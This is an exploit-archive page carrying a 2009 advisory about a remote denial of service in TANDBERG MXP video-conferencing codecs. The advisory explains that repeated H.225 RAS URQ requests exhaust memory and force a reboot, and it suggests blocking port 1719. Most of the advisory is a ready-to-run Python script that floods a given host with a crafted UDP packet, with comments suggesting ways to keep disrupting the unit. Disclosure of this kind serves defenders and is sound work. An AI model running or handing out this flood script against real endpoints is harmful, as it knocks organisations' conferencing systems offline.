exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

TANDBERG Remote Denial Of Service

TANDBERG Remote Denial Of Service
Posted Dec 8, 2009
Authored by otokoyama

TANDBERG versions F8.2, F8.0, F7.2, and F6.3 suffer from a remote denial of service vulnerability.Proof of concept code included.

tags | exploit, remote, denial of service, proof of concept
SHA-256 | 2b21a9aefbaf66a2579d5f3e48cb4a7acc6c33467ab3e429638d2db9dc527287

TANDBERG Remote Denial Of Service

Change Mirror Download
Security Advisory


Platform : TANDBERG
Date : November 6, 2009
Affected : All MXP FIPS140 Current as of December 8, 2009
Tested : F8.2, F8.0, F7.2, F6.3
Unconf : VCS, BC, C90
Author : otokoyama


Problem Description:

Issues with the H.225 RAS implementation in TANDBERG Codecs.
*This has been confirmed when FIPS140 Mode is set to active.*

For the DoS to affect that Tandberg, H.323 Gatekeeper mode must
be set to "On" or "Auto" as opposed to off.

The Tandberg Endpoint does not have to be registered with a gatekeeper.

The DoS is simply sending a RAS URQ request >3280 times.
The Tandberg endpoint will swiftly run out of memory to process the request
and subsequently reboot. The packet repetition amount required to crash
depends on how many other legitimate requests the Endpoint is holding in its
stack, if the tester wishes for clean results she/he may wish to reboot the
Endpoint before running the PoC.

However it is difficult to fit in any payload after the crashing packet (in
a live remote exploit)as the person attempting this would have no control
over what is already in the Endpoint network stack but due to the nature of
video conferencing.

This DoS would be effective on a large number of Endpoints that are on
public IP. It is quite possible that the routed Endpoints(traversal, NAT,
Port Forwarding) would allow this packet through as it is seemingly
legitimate(most VC Network Admins set up Deep Packet Inspection exclusions
to the VC Endpoints due to the nature of RTP, which in TCPDUMP looks like a
UDP flood anyway)

This is by no means a new vuln and it has existed on many platforms and
products till today (and still does ;)) but it's high time it got patched.

Mitigation : Block RAS requests at the router with an ACL, destport:1719
: Invest in traversal infrastructure and deploy it
correctly.

Code attached. Feel free to vrfy.

#-----------No error detection\ success confirmation ]\
# /
# -otk _______________/

import socket, sys

if len(sys.argv)!= 3:
print "\n[*] Usage: %s <ip> <port>\n" % sys.argv[0]
sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2]) #port 1719 by default

pkt = (
"\x18\x40\xf9\x12\x01\x00\xc0\xa8"
"\x01\x23\x06\xb8\x4a\x00\x32\x00"
"\x33\x00\x64\x00\x66\x00\x35\x00"
"\x35\x00\x39\x00\x65\x00\x2d\x00"
"\x31\x00\x65\x00\x61\x00\x66\x00"
"\x2d\x00\x31\x00\x31\x00\x62\x00"
"\x32\x00\x2d\x00\x61\x00\x38\x00"
"\x39\x00\x35\x00\x2d\x00\x30\x00"
"\x30\x00\x31\x00\x30\x00\x66\x00"
"\x33\x00\x31\x00\x38\x00\x65\x00"
"\x64\x00\x30\x00\x62\x00\x5f\x00"
"\x62")

print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

i = 0
while(1):
i += 1
if (i <= 6000): #Change to increase possibility of crash
data = s.sendto ( pkt, ((host,port)) )
print "[+] Sending packet" #remove this if you don't like spam
else: #You could also change this area to send a slow #interval RAS URQ, essentially unregistering
#the unit constantly, this wouldn't shut it
#down but would be very annoying.
break

print "[+] done, if host is still up you lost, check tcpdump\n"
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close